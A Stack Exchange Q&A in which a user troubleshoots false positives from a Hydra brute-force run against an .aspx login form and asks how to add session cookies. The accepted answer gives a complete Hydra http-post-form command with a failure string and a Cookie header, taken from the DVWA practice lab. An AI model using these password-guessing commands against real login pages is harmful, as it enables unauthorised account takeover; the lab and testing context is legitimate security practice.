# how to get cookies from aspx site to use it with hydra

Tags: authentication, passwords, brute-force, password-cracking

I've been playing around with Hydra and .aspx site  and I've hit a bit of a snag - Hydra responds letting me know that the first 16 passwords in my password list are correct when none of them are.

Syntax :

```
hydra 192.168.88.196 -l admin -P /root/lower http-post-form "/mmm/index.aspx:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect."
```

Output

```
Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2015-05-05 22:30:51

[DATA] 16 tasks, 1 server, 815 login tries (l:1/p:815), ~50 tries per task

[DATA] attacking service http-get-form on port 80

[80][www-form] host: 192.168.88.196   login: admin   password: adrianna

[STATUS] attack finished for 192.168.88.196 (waiting for children to finish)

[80][www-form] host: 192.168.88.196   login: admin   password: adrian

[80][www-form] host: 192.168.88.196   login: admin   password: aerobics

[80][www-form] host: 192.168.88.196   login: admin   password: academic

[80][www-form] host: 192.168.88.196   login: admin   password: access

[80][www-form] host: 192.168.88.196   login: admin   password: abc

[80][www-form] host: 192.168.88.196   login: admin   password: admin

[80][www-form] host: 192.168.88.196   login: admin   password: academia

[80][www-form] host: 192.168.88.196   login: admin   password: albatross

[80][www-form] host: 192.168.88.196   login: admin   password: alex

[80][www-form] host: 192.168.88.196   login: admin   password: airplane

[80][www-form] host: 192.168.88.196   login: admin   password: albany

[80][www-form] host: 192.168.88.196   login: admin   password: ada

[80][www-form] host: 192.168.88.196   login: admin   password: aaa

[80][www-form] host: 192.168.88.196   login: admin   password: albert

[80][www-form] host: 192.168.88.196   login: admin   password: alexander

1 of 1 target successfuly completed, 16 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-05-05 22:30:51
```

I have read that we can add cookies to hydra okay: `"H=Cookie: security;low;PHPSESSID=<value for PHP SESSID cookie"`

1. How do you get cookies from aspx?
2. How do you provide it to hydra?

Answer (score 4, accepted):

Use a browser plugin such as [Cookies Manager Plus](https://addons.mozilla.org/en-US/firefox/addon/cookies-manager-plus/) on Firefox, then you can simply copy the value to the clipboard.

As you say, simply paste the value into the command line for Hydra.

[See my answer here](https://security.stackexchange.com/a/82661/8340) for the syntax that worked for me.

```
"/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=incorrect:H=Cookie: PHPSESSID=07b7ebb2faea96f8471ecdb759e68108; security=low"
```

So instead of `PHPSESSID` and the value you include the name of the ASP.NET session ID and value.

Comment: thank u so much you really make my day but what is security level how to decide that thanks again :)

Comment: @user3306821: `security` is just another cookie on the [DVWA](http://www.dvwa.co.uk/).

Comment: so i dont need to add it to my syntax i have just to add cookie session ??

Comment: the wrong login msgs don't appear in source code of the page just onsubmit="javascript:return WebForm_OnSubmit();

Comment: <span class="alert">Invalid user name or password.</span> i found this